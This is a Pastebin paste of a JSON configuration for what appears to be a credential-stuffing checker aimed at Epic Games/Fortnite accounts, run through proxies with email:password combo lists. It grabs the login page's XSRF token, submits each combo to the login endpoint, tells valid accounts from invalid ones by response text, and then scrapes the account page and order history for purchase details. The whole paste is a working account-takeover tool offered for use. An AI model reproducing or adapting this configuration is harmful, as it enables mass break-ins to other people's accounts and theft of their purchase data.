Advertisement
Guest User

Untitled

a guest
Apr 10th, 2018
25,983
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.41 KB | None | 0 0
  1. {
  2. "General": {
  3. "name": "Fortnite",
  4. "proxyType": "Proxies",
  5. "comboType": "Email",
  6. "credit": "Polaron"
  7. },
  8. "Requests": [
  9. {
  10. "actionUrl": "https://accounts.epicgames.com/login/doCustomLogin?redirectUrl=https%3A%2F%2Fwww.epicgames.com%2Ffortnite%2F&productName=fortnite",
  11. "method": "GET",
  12. "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36",
  13. "successKeys": [
  14. "X-XSRF-TOKEN"
  15. ],
  16. "variables": [
  17. {
  18. "name": "xsrf",
  19. "type": "Regex",
  20. "pattern": "XSRF-TOKEN\" value=\"([^\"]*)",
  21. "usedFor": "postData"
  22. }
  23. ]
  24. },
  25. {
  26. "actionUrl": "https://accounts.epicgames.com/login/doCustomLogin",
  27. "method": "POST",
  28. "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36",
  29. "contentType": "application/x-www-form-urlencoded; charset=UTF-8",
  30. "postData": "X-XSRF-TOKEN=+xsrf|1+&X-XSRF-URI=%2Flogin%2FdoCustomLogin&fromForm=yes&authType=&linkExtAuth=&redirectUrl=https%3A%2F%2Fwww.epicgames.com%2Ffortnite%2F&epic_username=<USER>&password=<PASS>&rememberMe=YES&productName=fortnite",
  31. "successKeys": [
  32. "redirectURL"
  33. ],
  34. "failureKeys": [
  35. "Sorry the credentials you are using are invalid."
  36. ]
  37. },
  38. {
  39. "actionUrl": "https://www.epicgames.com/account/personal",
  40. "method": "GET",
  41. "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36",
  42. "successKeys": [
  43. "Personal Details"
  44. ]
  45. },
  46. {
  47. "actionUrl": "https://www.epicgames.com/payment/ajaxGetOrderHistory?",
  48. "method": "GET",
  49. "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36",
  50. "headers": [
  51. {
  52. "name": "x-requested-with",
  53. "value": "XMLHttpRequest"
  54. }
  55. ],
  56. "successKeys": [
  57. "orderStatus\":\"COMPLETED"
  58. ],
  59. "variables": [
  60. {
  61. "name": "orders",
  62. "type": "Regex",
  63. "pattern": "description\":\"([^\"]*).*?quantity\":([^,]*).*?amount\":\"([^\"]*)",
  64. "usedFor": "capture"
  65. }
  66. ],
  67. "capture": [
  68. "Order: +orders|1+, Quantity: +orders|2+, Amount: +orders|3+"
  69. ]
  70. },
  71. ]
  72. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement